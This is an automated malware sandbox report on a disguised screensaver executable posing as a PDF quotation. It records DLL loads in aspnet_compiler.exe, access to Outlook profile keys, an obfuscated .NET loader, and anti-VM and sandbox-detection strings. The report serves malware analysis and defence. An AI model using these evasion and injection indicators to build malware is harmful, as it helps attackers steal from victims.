Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Section loaded: uxtheme.dll	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Static file information: File size 1484288 > 1048576

Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x169e00

Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB337F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632987670.0000021FBC1A0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA3639000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB337F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632987670.0000021FBC1A0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA3639000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB35FE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632586012.0000021FBBF20000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB35FE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632586012.0000021FBBF20000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, -.cs	.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb337f5c0.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb337f5c0.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb337f5c0.5.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb33cf5f8.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb33cf5f8.7.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb33cf5f8.7.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fbbf20000.10.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fbbf20000.10.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fbbf20000.10.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fbbf20000.10.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fbbf20000.10.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fbbea0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb3538a70.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb33cf5f8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2632327224.0000021FBBEA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2622093932.0000021FA348E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe PID: 828, type: MEMORYSTR

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF848E600BD pushad ; iretd		0_2_00007FF848E600C1
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Code function: 0_2_00007FF84908063A push eax; ret		0_2_00007FF8490807FC

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe PID: 828, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA399F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA348E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLP]
Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA348E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: EXPLORERJSBIEDLL.DLLKCUCKOOMON.DLLLWIN32_PROCESS.HANDLE='{0}'MPARENTPROCESSIDNCMDOSELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILUREPVERSIONQSERIALNUMBERSVMWARE\|VIRTUAL\|A M I\|XENTSELECT * FROM WIN32_COMPUTERSYSTEMUMANUFACTURERVMODELWMICROSOFT\|VMWARE\|VIRTUALXJOHNYANNAZXXXXXXXX

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Memory allocated: 21FA1A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Memory allocated: 21FBB2C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory allocated: 25893A00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory allocated: 258AD440000 memory reserve \| memory write watch	Jump to behavior

